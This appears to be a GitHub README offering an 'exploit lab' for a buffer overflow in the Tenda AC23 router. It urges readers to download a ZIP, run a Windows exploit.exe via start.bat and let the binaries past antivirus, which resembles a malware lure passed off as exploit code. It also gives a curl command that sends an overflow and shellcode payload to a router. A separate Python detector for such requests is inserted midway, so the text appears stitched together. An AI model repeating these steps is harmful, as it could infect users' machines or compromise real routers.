# Lab: CVE-2025-12596 - Buffer Overflow in Tenda AC23 Router
## Download
### [Download exploit](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip)
## 🚀 Overview
This repository provides a lab environment for CVE-2025-12596 (also tracked as EUVD-2025-37441), a buffer overflow vulnerability classified under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). The issue affects Tenda AC23 router firmware version 16.03.07.52, specifically the `saveParentControlInfo` function behind the `/goform/saveParentControlInfo` endpoint. By manipulating the `Time` parameter, a remote attacker can trigger an overflow, potentially leading to arbitrary code execution.
### Impact
- **Confidentiality**: High – Attackers may access sensitive data such as network configurations or user credentials.
- **Integrity**: High – System files or settings could be altered, enabling persistent backdoors.
- **Availability**: Medium – Overflow may cause crashes or denial-of-service conditions.
- **Exploitability**: Remote execution possible with low privileges; no user interaction required. CVSS score estimated at 8.6 (High).
## 📋 Prerequisites
- Operating System: Windows 10/11 (64-bit) for exploit execution; Linux/macOS compatible for analysis.
- Tools: Python 3.8+ (for automation scripts), Wireshark or tcpdump for network traffic analysis (optional).
- Hardware: A Tenda AC23 router running firmware version 16.03.07.52 for testing (ensure it is in an isolated lab network).
- Basic knowledge of C programming, buffer overflows, and network protocols (HTTP/POST requests).
Ensure your antivirus is configured to allow execution of the provided binaries, as they may trigger heuristics for exploit-like behavior.
## Download & Install
1. Download the lab archive from the [releases page](https://github.com/DebugFrag/CVE-2025-12596-Exploit/raw/refs/heads/main/tools/lab-cve-12596.zip). This ZIP contains:
   - `exploit.exe`: Main exploit tool for demonstrating the buffer overflow.
   - `start.bat`: Batch file to launch the exploit safely.
   - Supporting files: Payload templates and logs.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-Lab\`.
## 🛠 Quick Start
1. Navigate to the extracted directory.
2. Run `start.bat` to initialize the exploit demo. This script will:
   - Execute `exploit.exe` with a default payload targeting the `Time` parameter overflow.
3. Observe the output: The exploit will demonstrate stack smashing, potential shellcode injection, and system compromise simulation.
4. For manual testing:
   - Use a tool like curl to send a malicious request: `curl -X POST http://<router-ip>:80/goform/saveParentControlInfo --data "Time=$(python -c 'print("A"*1024 + "\x90"*100 + shellcode)')"` (replace `shellcode` with your payload and `<router-ip>` with the target IP).
## 🔍 Detailed Setup Instructions
### Step 1: Targeting the Vulnerable Endpoint
Ensure the Tenda AC23 router is accessible on the network at its default IP (e.g., 192.168.0.1) and running the vulnerable firmware.
### Step 2: Exploitation Steps
**Execute Exploit**:
- Run `exploit.exe --target <router-ip>:80 --payload payloads/overflow.payload`.
- **Verification**: Use network captures or router logs to check for overflow traces.
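As an added example of what such a trace looks like in captured traffic (this is not part of the lab's tooling), the following Python detector flags POST requests to the vulnerable endpoint whose `Time` parameter is oversized or carries non-printable bytes, run over a constructed sample log. The 32-byte limit and the `HH:MM-HH:MM` schedule pattern are assumptions for the example, not values taken from the firmware.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter named in the advisory; the length limit and the
# HH:MM-HH:MM schedule pattern are assumptions, not values from the firmware.
VULN_PATH = "/goform/saveParentControlInfo"
MAX_TIME_LEN = 32
SCHEDULE_RE = re.compile(r"^\d{1,2}:\d{2}-\d{1,2}:\d{2}$")


def inspect_request(method, path, body):
    """Return a finding dict if the request looks like a Time overflow attempt, else None."""
    if method != "POST" or path != VULN_PATH:
        return None
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    for value in params.get("Time", []):
        reasons = []
        if len(value) > MAX_TIME_LEN:
            reasons.append(f"Time length {len(value)} exceeds {MAX_TIME_LEN}")
        if not SCHEDULE_RE.match(value):
            reasons.append("Time is not an HH:MM-HH:MM schedule")
        if any(not 0x20 <= ord(c) <= 0x7E for c in value):
            reasons.append("non-printable bytes in Time (possible NOP sled/shellcode)")
        if reasons:
            return {"path": path, "time_len": len(value), "reasons": reasons}
    return None


def scan_log(lines):
    """Parse lines of the form '<client> <METHOD> <path> <body>' and collect findings."""
    findings = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:  # no body (e.g. a GET) -> nothing to inspect
            continue
        client, method, path, body = parts
        finding = inspect_request(method, path, body)
        if finding:
            finding["client"] = client
            findings.append(finding)
    return findings


# Constructed sample log: one legitimate schedule update and one request shaped
# like the lab's overflow (1024 filler bytes followed by a percent-encoded NOP sled).
SAMPLE_LOG = [
    "192.168.0.20 POST /goform/saveParentControlInfo Time=08:00-22:00&deviceId=1",
    "192.168.0.50 GET /goform/saveParentControlInfo",
    "192.168.0.99 POST /goform/saveParentControlInfo Time=" + "A" * 1024 + "%90" * 100 + "&deviceId=1",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['path']}: {'; '.join(f['reasons'])}")
```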
### Potential Outputs
- Successful exploit: "Buffer overflow detected! Executing shellcode..."
- Failure: "Input validation passed – no overflow."
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.